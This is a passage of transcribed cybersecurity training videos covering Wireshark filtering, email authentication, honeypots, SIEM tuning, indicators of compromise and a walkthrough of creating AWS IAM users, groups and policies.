could put that in and press Enter. And now I'm filtering only on that IP address, whether it's the Source or
Destination. You can also specify Source and Destination. But here, I've simply specified ip.addr or address.
So again, notice the use of the double equals sign. Now, I could take that a step further, because notice here
that I've got a lot of transmissions here that are not specifically HTTP.
[Video description begins] He points to the first section in the content pane. [Video description ends]
So we can start to put conditions together using the &&, so maybe http, so &&http, press Enter.
[Video description begins] He enters ip.addr==192.168.4.24&&http in the address bar. The corresponding
details are displayed in the first section. [Video description ends]
So now, not only am I filtering on that specific IP address. But also only for HTTP transmissions on the
network. So the list is much smaller as we can see. Now, you can also click the Expression button over on the
far right of the address bar, where you can start to put together your filters.
[Video description begins] The corresponding dialog box opens. [Video description ends]
We've got a number of protocols that are listed here. So notice for example, if I were to choose something,
well, it could be anything. Let's say we were to choose the Address Resolution Protocol or ARP. So why don't
we go back up in the list a little bit. There it is, ARP, and here we can see we've got a number of items here.
So we can see the Destination hardware MAC address or the target MAC address. If I were to select that, it
adds it at the bottom. So arp.dst for Destination, .hw_mac, hardware MAC address. And then I can choose
whether it's present, whether it equals something. Whether it does not equals something, is greater than or less
than, contains matches, and so on. And then I can put in a value, and notice it's constructing it as I click on
items in the screen.
[Video description begins] He points to the value displayed at the bottom. [Video description ends]
So let's say I'm going to scroll down here and I'm going to say arp.source, I'm looking at the source MAC
address, source hardware MAC address.
[Video description begins] From the list, he selects an option called “arp.src.hw_mac · Sender MAC
address”. [Video description ends]
So let's see, source hardware MAC address, right here, Sender MAC address.
[Video description begins] He selects the “!=” option in a section called “Relation”.[Video description ends]
Let's say I want to say not equal to and I'll just put in a value here, this has a MAC address so we can see that
that is shown.
[Video description begins] He enters the text: “74:83:c2:96:5d:ed” in a text box called “Value (Ethernet or
other MAC address)”. [Video description ends]
[Video description begins] He points to the following text at the bottom: "arp.src.hw_mac !=
74:83:c2:96:5d:ed". [Video description ends]
[Video description begins] He clicks a button called "OK" and the dialog box closes. [Video description ends]
When really, I want that to be the only expression, arp.source hardware MAC address not equal to, and we've
got a specific value here.
[Video description begins] He points to the address bar. [Video description ends]
So when I press Enter, we can see that we've filtered everything out.
[Video description begins] He removes the other text and points to "arp.src.hw_mac != 74:83:c2:96:5d:ed" in
the address bar. [Video description ends]
Basically, we're seeing any transmissions that do not include the MAC address that is specified here.
So of course, I can just click the X over here or delete everything to remove all filters.
[Video description begins] He clicks the “X” button adjacent to the address bar. [Video description ends]
Now what we can also do, let's see. Why don't we filter on HTTP? Let's filter on HTTP. And I've got the first
packet selected. We can also go to the Analyze menu and choose Follow, TCP Stream.
[Video description begins] He selects a menu called "Analyze" and selects a menu option called "Follow". He
further selects an option called "TCP Stream" from the flyout. The corresponding dialog box opens. [Video
description ends]
So instead of going through each and every individual packet in that session, it puts it together and makes it a
little bit easier to read here. So we can see that there's not much that was encrypted, a lot of it was sent in clear
text. Now, I'm going to close out of that. And finally, one of the other things we should know about filtering,
let's just remove our filter here, is that we can search. So if I choose Edit, Find Packet, I could choose, for
example, the Packet details.
[Video description begins] A new bar is displayed below the address bar. It includes drop-down list boxes
called “Packet details”, “Narrow & Wide”, and "String”. [Video description ends]
And I'm not going to turn on case sensitivity, but I'm going to look for a string, in this case authentication. And
I'll click Find, and it's found authentication down here in the payload.
[Video description begins] He points to the third section in the content pane. [Video description ends]
So it stopped at that packet. Now I'll click Find again, it goes to the next packet, and so on. So essentially, you
can search for things quickly when you've captured network traffic and you're analyzing it. And you can also
filter out the things that may not be of interest.
Upon completion of this video, you will be able to list common items to look for when monitoring an e-mail
ecosystem.
Objectives
list common items to look out for when monitoring an e-mail ecosystem
[Video description begins] Topic title: E-mail Monitoring. The presenter is Dan Lachance. [Video description
ends]
Even in this day and age of social media and tweeting or snapchatting, email still remains crucial for
organizations. Monitoring email is important when it comes to your organization's security posture. We're
talking here about what to look for in email for suspicious indicators, and then countermeasures that can be
applied to reduce their impacts. First of all looking at malicious payloads, how do we know that we might have
a malicious payload in an email message? Well, one would be to have intrusion detection systems analyzing
packet payloads looking for known problems in email or known malware. However, that's not always the most
efficient way to do things. Also looking for embedded links in email, users must have an awareness that they
shouldn't just be clicking on links provided in email messages even if the email looks legitimate.
For example, if the tax department sends you an email message saying, you need to pay up or you're going to
jail, click here to pay. That's not the way to go about it. What you would really do is sign into your online tax
account outside of that email, and then check to see if there is in fact a notification from the tax department or
call them up. We want to make sure people aren't easily fooled by these types of potentially scary phishing
scams. File attachments have long been known to be a great delivery vehicle for malware. So it's important that
there is an awareness of not opening up file attachments and being very selective. Problem is that malicious
users know this. And they'll often craft email messages that look like they would have been legitimately sent to
somebody, such as making it look like it came from a supplier, here's an invoice based on last week. And you
might have actually purchased something from your supplier last week. And many malicious users will
perform reconnaissance. They're going to do their home work to see if they can learn a lot of these items up,
these circumstances up to make it more believable to trick people. So if it sounds like there aren't a lot of
perfect solutions at the technical level to prevent malicious payloads that would be correct. The biggest part of
it is the human element. It's important that people be suspicious and cynical about anything they receive in
email. Then we have Domain Keys Identified Mail, DKIM.
Now, DKIM is really about email digital signatures which is an assurance that the message is authentic. And
this is transparent to users unless there is a problem and it can't be verified. When you digitally sign an email
message, you would do that for important messages. What's happening is your mail system is retrieving your
private key. You have to have been issued a public and private key pair where the keys are related. Your
private key is used to generate a digital signature. And then, the message is sent on its way, then nothing's
encrypted. There's no confidentiality. This is all about message authenticity at this level. When the recipient
opens that message, the mail software will detect that it's digitally signed. Will find the mathematically related
public key and verify that the signature is authentic. So recipients must have your public key to verify digital
signature that you've created on your end with a private key. Then there's email monitoring in the sense of the
sender policy framework or SPF.
Now, this is related to domain based message authentication, reporting, and conformance, otherwise called
DMARC. That one's quite a mouthful. So DMARC is used in email systems and it references the Sender
Policy Framework, and also digitally signed email messages to determine if the message seems authentic or if
it seems like it was completely spoofed or forged. So that's what that's about. The idea is to try to reduce the
occurrence or the impact of phishing scams. And also impersonation, such as checking the email address of the
message. If you get an email message that looks like it came from Acme Bank Incorporated but yet the email
address has no reference to that in the name, then it probably is not authentic. But often times, we don't want
just users to look at this mainly and make that decision. We also want to, in addition to that, include technical
solutions that will be able to determine those things.
[Video description begins] Topic title: Honeypots. The presenter is Dan Lachance. [Video description ends]
Most people that have a sweet tooth love honey. Well, in our discussion a honeypot is made to look like a
sweet target for an attacker. So a honeypot mimics a production system and/or sensitive data. Now this can be
configured to appear vulnerable. The idea is that we want to essentially attract malicious activity so we can
learn more. So honey pots have pros and cons, and you have to carefully weigh these when determining if
you're going to deploy a honeypot solution. The pro, or the benefit of a honeypot begins with early incident
detection. So let's say that you deployed a virtual appliance that looks like a vulnerable web server. Well, by
doing that, before you deploy that same web server for real in production, you can start to learn about what
types of attacks might happen against that site before you have a real life system.
So you can learn about attack patterns, attack vectors, so what aspect of the web server stack will be attacked,
it might be just a component that's used to add functionality to the website. You can even potentially learn
about attacker identities, such as the location of the attack is coming from. But the reality is it's pretty easy for
attackers to remain anonymous, especially when it comes to the dark net and using different types of
addressing super imposed on top of the traditional Internet. It can make a very difficult to see where an attack
is really coming from. What are some of the cons or some of the negative aspects of deploying honeypots at
the IT level? Well there's legal liability, where you might scratch your head and say what do you mean by that,
you're deploying something that's not real.
Yes, but you need to be very careful. You want to make sure that you don't mistakenly include some actual real
data that's sensitive. You don't want to violate, for example, any patient rights against sensitive medical data.
So, you'll always use fake data on a honeypot. The other thing to think about though, not just that, but let's say
that you've got a honeypot and you've done your due diligence to make sure only fictitious data is on it, but
then it gets compromised.
Okay, well, I kind of expect that on a honeypot, because that's sort of what I'm trying to make it look like, a
vulnerable host, perhaps. Yes, but you have to be careful because what if that machine is compromised, and
then gets used for other illegal activity. Such as your machine becoming a zombie in a botnet that's part of a
distributed denial of service attack. That's not good. So we need to be very, very diligent and careful with how
we deploy honeypots, how long they stay up and running, we have to make sure we monitor them,
continuously.
[Video description begins] Honeypot Configurations. [Video description ends]
Honeypots can be configured to appear as a specific server operating system, whether it's a UNIX variant, a
Linux variant, a Windows variant, or even some kind of industrial control system operating system variant like
VX works. It can be configured to look like a specific service that's up and running, whether it's a web server
an NTP time server, DNS name resolution server, SMTP mail server, the list just goes on and on and on,
anything you can think of. We could even have individual files or folders that are made to appear vulnerable.
Now we can have a HoneyDrive honeypot.
HoneyDrive is a tool that lets us deploy a honeypot as a Linux based virtual appliance. So it's a virtual
machine. And we can enable it as an SSH honeypot. So it looks like it's an SSH host that might be vulnerable.
That would be useful if we are curious about learning about how an SSH exposed port might be attacked on
our network. You could also set up a website honeypot to look like a real website when in fact, it is not and it
most certainly does not contain any real sensitive data. So working with honeypots means being very diligent
with your monitoring and analytical tools to capture the activity of malicious users. Whether they're just
performing reconnaissance, we're actually attempting to exploit discovered vulnerabilities.
So we need to have some kind of real-time monitoring solution in place. We should have log forwarding
enabled because if the honeypot itself is compromised, then the logs could be tampered with or compromised.
We want log information to be forwarded immediately as it occurs to another safe location. We have to think
about the placement of the honeypot. For example, do you want to mimic what would happen to an open SSH
port that's exposed to the Internet? If that's the case, you should consider placing the honeypot in a
demilitarized zone, or DMZ, that is exposed directly to the Internet. You then have to determine whether
you're going to use a physical honeypot configuration, a physical server, or a virtual machine appliance
solution.
After completing this video, you will be able to recognize how SIEM provides centralized security event
monitoring and management.
Objectives
recognize how SIEM provides centralized security event monitoring and management
[Video description begins] Topic title: SIEM . The presenter is Dan Lachance. [Video description ends]
Most security analysts are probably suffering from alert fatigue, seeing too many incoming false positives
about security incidents that just aren't occurring.
[Video description begins] Security Information and Event Management (SIEM ). [Video description ends]
What can we do about this? Well in a larger enterprise, a security information and event management or SIEM
system deals with real-time security alerts. And those security events can come from a multitude of sources.
So, SIEM is a centralized security incident type of solution. But we have to be careful about the configuration
for event analysis and correlation perhaps with other related events that could indicate that there's some kind of
suspicious activity taking place.
SIEM data sources include web applications, network infrastructure equipments, like unified threat
management solutions or packet filtering, firewalls, proxy servers, intrusion detection sensors. Databases, in
other words, any database log events related to security, shared folders, authentication servers. So you have a
number of different ways that the centralized SIEM solution can receive data to analyze it looking for security
incidents.
Now the configuration of a SIEM solution is going to be different from one organization to the next. And the
reason is because every organization has a different deployment in their IT ecosystem of servers and routers
and firewalls, and web application servers. It's all different, and also there's different tolerance for risk, and
what's normal in one active environment for one company might be considered abnormal in a different
company. You need to tweak your SIEM solution. It needs to be tweaked for what's normal in your
environment. By doing this, you can reduce false positives. This feeds back into security technicians suffering
from alert fatigue. They keep getting alerts about things that just aren't alerts, we want to reduce that.
So we need to have a baseline of what's normal before we can identify what's abnormal, and that's where the
tweaking and configuration for your specific network kicks in. There are times when your SIEM solution will
also need to be compliant with certain laws and regulations, such as ensuring that you are using an acceptable
encryption cipher and a key length. Or that you've got alert thresholds configured appropriately to be
compliant with certain security standards. For example, requiring accounts be locked out after three incorrect
login attempts. So you might tweak your SIEM configuration in accordance with those types of items. Because
do you really want a notification after two incorrect login attempts if that's not how your environments
configured? Probably not. So it's important to tweak your SIEM configuration.
Upon completion of this video, you will be able to recognize how to filter out noise to identify suspicious
activity.
Objectives
recognize how to filter out noise to identify suspicious activity
[Video description begins] Topic title: Indicators of Compromise. The presenter is Dan Lachance. [Video
description ends]
Security solutions that are designed to alert technicians of abnormal activity do so by seeking indicators of
compromise, otherwise called IoCs.
The idea is to filter out irrelevant data. Filter out all of the background noise and try to focus on what's strange.
So if we've got a device on the network today that wasn't there yesterday, and this is not a guest network.
Perhaps this is an infrastructure only network segment that contains storage arrays. Why is there a new device
on that network today? Should it be there or should it not be there? So we need to be able to filter that out
based on what's normal, in that case, for that specific network segment. So we're talking about identifying
suspicious activity. Suspicious activity could even be as simple as abnormal performance spikes, like abnormal
CPU utilization or some kind of a service interruption. As in this internal line of business web app never goes
down or if it does, it's for this reason. Why is it abnormal that it's going down at this point during the day?
Could it be because it's overwhelmed with user requests? The only way you can answer those questions and
come up with anything intelligent is to find out what is normal based on how we use that IT solution.
So indicators of compromise come in many, many different flavors. It could be abnormal traffic patterns on the
network. Abnormal traffic, well, what does that mean? Well, maybe it's not normal for dozens of stations on a
network in the middle of the night to send outbound traffic to the same host over port 443. That might indicate
that we've got infected computers reaching out to a command and control server. Essentially, those machines
will be part of a botnet under singular malicious user control. We might have rogue network devices as we've
identified a moment ago where we might have new devices on the network that normally aren't there that
shouldn't be there. Or maybe we've got an Apple iOS device on the network and that's not used at all in the
company. And BYOD or bring your own device is not supported by the organization.
So why all of a sudden do we have Apple IOS devices on the network? It doesn't make sense. I should be
suspicious. Non-standard port usage, a port identifies a network service. So why might we have a different port
number being used for a different service? In other words, why might we have HTTP traffic being funneled to
a host out on the Internet, maybe on some abnormal port other than 80 or 443, could be to hide that type of
traffic. Do we have excessive outbound traffic? Again, what's excessive? You have to know what's normal
before you can determine what's excessive or not. Same with CPU utilization or the amount of RAM being
used.
The creation of new user accounts could be an indicator of compromise. If that wasn't done in accordance with
organizational security policies. It could be an attacker that's compromised a system that's creating a backdoor
account. File and registry changes are always suspicious when not specifically allowed or made by a user.
Could be malware that's made that change. So there are many different types of indicators of compromise. And
it's important that we filter out the noise to focus on potentially real indicators of compromise so that we can
put in motion an incident response plan as quickly as possible.
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the use of centralized threat monitoring. And how it can be used to identify
suspicious activity and help reduce incident response time. We did this by exploring the relationship between
continuous monitoring and quick security incident response times. The relevance of common log types. We
looked at how to view cloud based audit events and how to send Linux log events to a centralized logging host.
We looked at how to perform Windows event log filtering and how to configure cloud-based alarms. Then we
took a look at how the OSI model layers relate to communications hardware and software. We looked at what
to watch out for when analyzing network traffic and an email ecosystem. We looked at where to use honeypots
to monitor malicious activity. We looked at how SIEM provides centralized security event monitoring and
management. And finally, we looked at how to identify suspicious activity by filtering out all of the noise.
In our next course, we'll move on to explore user account security. Including how to configure user accounts to
help maximize authentication and authorization security. For both on-premises and cloud based users, groups,
and roles.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance. He is an
IT Trainer / Consultant. [Video description ends]
Hi I am Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer,
as a programmer, a consultant, as well as an IT tech author, and editor. I've held and still hold IT certifications
related to Linux, Novel, LOTUS CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, Cloud Solutions, Linux management, and configuration and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CYSA Plus
certification exam, is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats and risks to an organization, to configure and use threat detection
tools and secure and protect an organization's applications and systems. In this course, we're going to explore
the configuration of user accounts for on-premises and cloud-based users, groups and roles to maximize
authentication and authorization security. I'll start by examining the role of identity and access management,
otherwise called IAM, in securing IT environments. And I'll demonstrate how to create IAM users, groups and
roles in Amazon Web Services, AWS. I'll then show how to configure user permissions policies in AWS. I'll
deploy simple Active Directory in AWS, and also join a cloud virtual machine to a cloud-based directory
service. Next, I'll explore how multi-factor authentication, otherwise called MFA, enhances sign in security,
and I'll demonstrate how to enable IAM user MFA. Lastly, I'll examine the role of identity federation across
organizations. And I will demonstrate how to set permissions for both Windows and Linux systems.
[Video description begins] Topic title: Identity and Access Management. The presenter is Dan
Lachance. [Video description ends]
Securing resources in a network environment means dealing with identity and Access Management, otherwise
called IAM. This means creating and managing user accounts and controlling their access to resources.
Perhaps adding users to groups with similar needs and granting permissions to groups, or even using roles. A
role is another entity that usually represents a software component that needs permissions to something. So it
could be a front-end web application, for example, that needs access to a back end database to perform queries
or to write to that database. IAM deals with authentication and authorization. Authentication happens first, it's
proof of identity. Single-factor authentication uses a single authentication category to prove identity. Single-
factor might include username and password. It's two items, but they're in the same category, something you
know, hence it is single-factor authentication. Multi-factor authentication uses items or factors from different
categories. So we already know that the username and password are single factor, there's something you know.
However, a smartcard is something you must physically have in your possession. You might even need to
know a pin to use that smartcard. That's something you know, but you must possess the smartcard. So the
combination of username, password, and smartcard then in this example, constitutes multi-factor
authentication. Authorization as we know occurs after successful authentication. It really determines what level
of access an entity has to a given resource, whether that resource is an entire server, a file, a folder, a database,
anything like that. So it's controlled access to apps and network resources. Now you can also configure policies
depending on your IAM solution that collect permissions together that you assign to users, groups or roles.
You might even build custom policies that you assigned that have specific permission sets that align with
business objectives.
[Video description begins] Custom or built-in policies assigned to users, group, roles. [Video description
ends]
Now identity and access management begins with an account request. This might even be automated as part of
employee onboarding. So when a new employee is hired, part of the process that gets triggered is the creation
of a user account. Now the request would follow by the actual account creation, and then the enforcement of
user access. Now the enforcement part might kick in with the configuration of multi-factor authentication.
Again, that entire process can be automated in a workflow as part of new employee onboarding. The other
thing though that might not be an automatable type of action, would be to make sure users are aware of
acceptable use policies. And part of your employee onboarding should always include what to watch out for in
terms of security, security training about scams, about how security is applied within the organization and so
on. The next part of the identity and access management life cycle is the logging, auditing and reporting based
on user activity. Also, it can be done at the group and roll level. And then there's the eventual removal of an
account such as when a user leaves the organization. Or in some cases, your organizational policies might not
dictate that the account get removed but rather disabled and kept for a period of time.
In this video, you will learn how to create cloud identities in Amazon Web Services.
Objectives
[Video description begins] Topic title: Creating Cloud IAM Users and Groups. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'm going to create a Cloud IAM user and group in Amazon Web Services.
[Video description begins] A window labeled "AWS Management Console" opens. It includes a section labeled
"AWS services", which further includes a search box labeled "Find Services". [Video description ends]
Here in the AWS Management Console, I'm going to search for IAM, and I'll click the result, which will take
me into the IAM Management Console.
[Video description begins] He types iam in the Find Services search box. The search result displays an IAM
link. He clicks the IAM link and a web page labeled "IAM Management Console" opens. [Video description
ends]
On the left, I'm going to start by creating a group. Here I've already got a number of groups.
[Video description begins] The IAM Management Console is divided into three parts: menu bar, navigation
pane, and content pane. The navigation pane includes various options labeled "Access management" and
"Access reports". The Access management option includes sub options labeled "Groups" and "Users". He
clicks the Groups sub option and its corresponding blade opens in the content pane. The blade includes a
button labeled "Create New Group" and a table with four columns and four rows. The column headers are
Group Name, Users, Inline Policy, and Creation Time. He clicks the Create New Group button and a wizard
labeled "Create New Group" opens in which a page labeled "Set Group Name" is displayed. [Video
description ends]
I'm going to create a new one by clicking the Create New Group button and it's going to be called
East_Admins_Group, and I'm going to click Next Step.
[Video description begins] The Set Group Name page contains a text box labeled "Group Name". He types
East_Admins_Group in the Group Name text box. Then he clicks a button labeled "Next Step". A page labeled
"Attach Policy" opens. [Video description ends]
Now we can attach a policy here in Amazon Web Services to this group. A policy is nothing but a collection of
related permissions.
[Video description begins] He points to a filter box labeled "Policy Type". [Video description ends]
For example, Amazon S3, Simple Storage Service is cloud storage. And if we wanted to allow read-only
access to Amazon S3, well, we could turn on that policy. You can also build custom policies or not attach a
policy at all, at least at this point in time, which is what I'm going to elect to do, no policy association.
[Video description begins] The Attach Policy page includes a table with three columns and multiple rows. The
column headers of the table are Policy Name, Attached Entities, and Creation Time. He checks and then
unchecks a checkbox adjacent to the AmazonS3ReadOnlyAccess row entry under the Policy Name column
header. [Video description ends]
So I'll click Next Step. And I'm going to click the Create Group button in the bottom-right and there's our new
group East_Admins_ Group.
[Video description begins] A page labeled "Review" opens. It displays Group name and Policies information.
Then he clicks a button labeled "Create Group" and the Create New Group Wizard closes. The Groups blade
displays. It includes a table with four columns and four rows. The column headers are Group Name, Users,
Inline Policy, and Creation Time. He points to the East_Admins_Group row entry under the Group Name
column header. [Video description ends]
Currently, it says there are 0 users in that group. I could always click on that group to open it up.
[Video description begins] He clicks the East_Admins_Group row entry and its corresponding blade opens. It
is divided into two sections. The first section is labeled "Summary". The second section contains three tabs
labeled "Users", "Permissions", and "Access Advisor". The Users tab is selected by default. [Video description
ends]
Now I could click the Add Users to Group button down here under the Users tab. I could also go to the
Permissions tab and attach a policy which is kind of the same screen we saw when we were creating this IAM
group.
[Video description begins] He clicks the Permissions tab which includes two sections labeled "Managed
Policies" and "Inline Policies". In the Managed Policies section, he clicks a button labeled "Attach Policy".
The Attach Policy page opens. Then he clicks a button labeled "Cancel" and the Attach Policy page
closes. [Video description ends]
I'm going to click on Users in the left and I'm going to create a new user account. Now we can see that we
already have users in existence here in Amazon Web Services. I'm going to go ahead click the Add user button
to add a new one.
[Video description begins] He clicks the Users sub option in the navigation pane and its corresponding blade
opens in the content pane. It includes a button labeled "Add user" and a table with multiple columns and three
rows. The column headers include User name and Groups. He points to CBlackwell, JGold, and MBishop row
entries under the User name column header. He clicks the Add user button and the Add user wizard opens.
The first page is divided into two sections labeled "Set user details" and "Select AWS access type". [Video
description ends]
So I'm going to create a user here, Neil Parks, so NParks has been created, I could click Add another user and
add a couple of them all at once.
[Video description begins] In the first section, he types NParks in a text box labeled "User name". Then he
points to a link labeled "Add another user". [Video description ends]
Down below from a security perspective, I need to determine what type of access this IAM user is going to
require. Is it going to be programmatic access to AWS Cloud resources? So whether this is a person that will
be given an access key and secret access key for the AWS account, which would allow them to use CLI
commands, command line interface, or PowerShell cmdlets to deploy and manage cloud resources or I can
give them AWS Management Console access, which is what I'm using right now. If there were an assistant
administrator, that would make sense. So I'm going to go ahead and do that.
[Video description begins] In the second section, he checks a checkbox labeled "AWS Management Console
access". [Video description ends]
I'm going go to turn on AWS Management Console access. And down below, we can have an Autogenerated
password or a Custom password. I'm going to leave it on Autogenerated password. I'm also going to leave the
option here where the user must create a new password at next sign-in. I'm just going to go ahead and click
Next: Permissions. And so just like when we were creating the group, we have to determine if we want this
specific user to have certain permissions. We can add the user to a group, so we can select the group here.
[Video description begins] He clicks a button labeled "Next: Permissions" and a page labeled "Set
permissions" displays. The Set permissions page contains three tiles labeled "Add user to group", "Copy
permissions from existing user", and "Attach existing policies". The Add user to group tile is selected and its
corresponding options are displayed which includes a button labeled "Create group" and a table with two
columns and four rows. The column headers are Group and Attached policies. [Video description ends]
We could copy permissions from another user, so we can mirror what's already been done and perhaps make
some changes.
[Video description begins] He selects the Copy permission from existing user tile and its corresponding table
with three columns and three rows displays. The column headers are User name, Groups, and Attached
policies. [Video description ends]
We can also attach policies directly to the user, much like we saw we could do for the group. I'm not going to
do any of those things yet, of course I could, I'll click Next: Tags.
[Video description begins] He selects the Attach existing policies directly tile and its corresponding table with
three columns and multiple rows displays. The column headers are Policy name, Type, and Used as. [Video
description ends]
I'm not going to add any additional tagging or metadata, I'll click Next: Review and then Create user.
[Video description begins] He clicks a button labeled "Next: Tags" and a page labeled Add tags (optional)
opens. It displays a table with three columns and a row. The column headers are Key, Value (optional), and
Remove. Then he clicks a button labeled "Next: Review" and a page labeled "Review" opens. It displays User
details such as User name and AWS access type. [Video description ends]
Now when I do this, because I selected to autogenerate the password, I can see the password is here. And I can
send an e-mail to the user's e-mail address with the sign in information, in this case for user NParks.
[Video description begins] He clicks a button labeled "Create user" and a success message displays with a
table. The table has three columns and a row. The column headers are User, Password, and Email login
instructions. The row entry under the User name column header is NParks. The row entry under the Password
column header is hidden and a Show link is displayed. The row entry under the Email login instructions is
Send email hyperactive link. He points to row entries. [Video description ends]
I could also click Show and I could copy that and put it in some other kind of a list. So initially at least, that's
going to be important.
[Video description begins] He clicks the Show link and the hidden password appears. [Video description ends]
Also I can see that user sign-in with IAM accounts in the cloud here for Amazon Web Services is done through
a special URL, which is provided here at the top.
So having done that, I'm going to go ahead and copy that password for now. I'm going to close out, and at this
point I could even go into my new user NParks, go into Groups, and add the user to a group.
[Video description begins] He copies the following password under the Password column header:
'0oSkY0FWEIe. Then he clicks a button labeled "Close", the Add User wizard closes, and the Users blade
displays. Then he clicks the NParks row entry under the User name column header and its corresponding
blade opens. It displays two sections. The first section displays User ARN, Path, and Creation time
information. The second section contains five tabs labeled "Permissions", "Groups", "Tags", "Security
credentials", and "Access Advisor". The Permissions tab is selected by default. [Video description ends]
So you can do it from either the user or the group level, it makes no difference. I want this person to be in the
East_Admins_Group, Add to Groups.
[Video description begins] He selects the Groups tab which includes a button labeled "Add user to groups".
Then he points to the Users sub option in the navigation pane. Then he clicks the Add user to groups button
and its corresponding page opens. It includes a table with four columns and four rows. The column headers
are Group Name, Users, Inline Policy, and Creation Time. He selects a checkbox adjacent to the
East_Admins_Group row entry under the Group Name column header. Then he clicks a button labeled "Add
to Groups". The Add user to groups page closes and the NParks blade displays. A row adds in the table with
two columns. The column headers are Group name and Attached permissions. The row entry under the Group
name column header is East_Admins_Group. [Video description ends]
Now that being said, there are no attached permissions because we didn't attach any to the group when we built
it. Let's go back to the East_Admins_Group in the Groups view. And let's open it up and let's Attach Policy.
Let's say we want to allow AmazonS3ReadOnlyAccess. And I'm going to click Attach Policy. It's showing up
here.
[Video description begins] He clicks the Groups sub option in the navigation pane and its corresponding table
opens in the blade. He clicks the East_Admins_group row entry under the Group Name column header and its
corresponding blade opens. In the blade, the Permissions tab is open which includes the Attach Policy button.
He clicks the Attach Policy button and the Attach Policy page opens. He selects a checkbox adjacent to the
AmazonS3ReadOnlyAccess row entry under the Policy Name column header. Then he clicks the Attach Policy
button and the Attach Policy page closes. The East_Admins_Group blade displays in which a table is
displayed with two columns and a row. The column headers are Policy Name and Actions. Their respective
row entries are AmazonS3ReadOnlyAccess and Show Policy | Detach Policy | Simulate Policy. [Video
description ends]
Let's go back to Users>NParks. Now we can see that AmazonS3ReadOnlyAccess is now what this user gets by
extension of being in the group, coming from membership in the East_Admins_Group.
[Video description begins] He clicks the Users sub option in the navigation pane and its corresponding blade
opens. Then he clicks the NParks row entry under the User name column header and its corresponding blade
opens which includes the Permissions tab. The Permissions tab displays a table with two columns and a row.
The column headers are Policy name and Policy type. Their respective row entries are
AmazonS3ReadOnlyAccess and AWS managed policy from group East_Admins_Group. [Video description
ends]
Now at any point in time when I'm looking at the user details, I can go to Security credentials and see the sign-
in link. And I can also perhaps manage the password if it's been forgotten.
[Video description begins] He selects the Security credentials tab and the Sign-in credentials information
displays which includes Summary and Console password. He highlights a link adjacent to the Summary
information, which reads: https://611279832722.signin.aws.amazon.com/console. Then he clicks a link
labeled "Manage" adjacent to the Console password information. A dialog box labeled "Manage console
access" opens. [Video description ends]
Let's go ahead and give this a whirl. I'm going to go to this URL and try to sign in as user NParks with the
autogenerated initial password. So when I go to Sign in into the AWS Management Console, I can specify. So
when I visit that special URL, it automatically fills in the AWS account ID. I'm going to put in NParks the
username and the autogenerated password.
And of course, it says you must change your password to continue. So I'll specify the old password and I'll
specify and confirm a new password. And after that, it signs me into the AWS Management Console as user
NParks. And of course, I only have permissions to do what the attached policies allow.
[Video description begins] Topic title: Cloud User Permissions Policies. The presenter is Dan
Lachance. [Video description ends]
Here in the AWS Management Console, I'm going to assign permissions through the use of policies.
[Video description begins] The AWS Management Console opens. [Video description ends]
So here in the console, I'm going to search for IAM, identity and access management, and I'll click it in the
resultant list. And on the left if I click Groups, here I can see a bunch of groups that have been created already.
[Video description begins] He types iam in the Find services search box. The search result displays an IAM
link. He clicks the IAM link and the IAM Management Console opens. Then he clicks the Groups sub option in
the navigation pane and its corresponding blade opens in the content pane. The blade includes a Groups table
with four columns and four rows. The column headers are Group Name, Users, Inline Policy, and Creation
Time. [Video description ends]
Such as East_Admins_Group, Group1, Group2, Group3. If I click on any of these groups, I can see under the
Users tab who's a member of the group.
[Video description begins] He clicks the East_Admins_Group row entry under the Group Name column
header and its corresponding blade displays. He selects the Users tab which includes a table with two columns
and a row. The column headers are User and Actions. Their row entries are NParks and Remove User from
Group. [Video description ends]
And of course if I click on the Users view on the left, I'll see the individual user accounts here in Amazon Web
Services. These particular user accounts are used when we've got individual users that require access to AWS
resources. Whether programmatically or for management purposes through the GUI that I'm using here.
[Video description begins] He clicks the Users sub option in the navigation pane and its corresponding blade
displays. It includes a User and Groups table with multiple columns and four rows. The column headers
include User name, Groups, and Access key age. He points to CBlackwell, JGold, MBishop, and NParks row
entries under the User name column header. [Video description ends]
So I'm interested in a user NParks, who is a member of the East_Admins_Group. If I open up user NParks,
under Permissions, we don't see any listed.
[Video description begins] He clicks the NParks row entry. Its corresponding blade opens in which the
Permissions tab is displayed, which further includes a section labeled "Permissions policies". He points to the
section. [Video description ends]
Now that means that there are no permissions that are assigned to this individual user account. Nor are there
any permissions assigned to any groups that this user is a member of.
[Video description begins] He selects the Groups tab in the NParks blade and its corresponding table with two
columns and a row displays. The column header are Group name and Attached permissions. The row entry
under the Group name is East_Admins_Group. There is no row entry under the Attached permissions column
header. [Video description ends]
Now when I open up a group, just like when I open up a user, I can go into the Permissions and see if there are
any assigned.
[Video description begins] He selects the Groups sub option in the navigation pane and its corresponding
blade opens with the Groups table. He clicks the East_Admins_Group row entry under the Group name
column header and its corresponding blade opens. In the blade, he selects the Permissions tab which includes
the Attach Policy button in the Managed Policies section. [Video description ends]
Here we don't have any policies attached. And a policy is really just a collection of related permissions,
whether it's related to managing virtual machines in the cloud, or storage, or templates. So I'm going to click
Attach Policy.
[Video description begins] He clicks the Attach Policy button and the Attach Policy page opens. The Attach
Policy page contains the Policy Type filter box and a Policy table with three columns and multiple rows. The
column headers are Policy Name, Attached Entities, and Creation Time. [Video description ends]
Here I get a list of policies, an alphabetical list of policies at Amazon Web Services and there are plenty of
them. As I scroll further down the list, the list keeps updating and updating. There's a lot here. So for example,
I'm going to search for s3. S3 stands for simple storage service. It's cloud storage in the AWS environment.
[Video description begins] He types S3 in the Policy Type filter box and the filtered result displays in the
Policy table. [Video description ends]
So what I want to do is make sure that members of this group have the AmazonS3ReadOnlyAccess. So I'm
going to put that check mark on. Notice, I could turn on the check marks for other policies if they needed other
types of permissions as well to other AWS resources. Then I'm going to click Attach Policy. And it's done.
[Video description begins] He selects the checkbox adjacent to the AmazonS3ReadOnlyAccess row entry
under the Policy Name column header. Then he clicks the Attach Policy button and the Attach Policy page
closes. The East_Admins_Group blade displays. The table with two columns and a row is displayed in the
Permissions tab. The column headers are Policy Name and Actions. Their respective row entries are
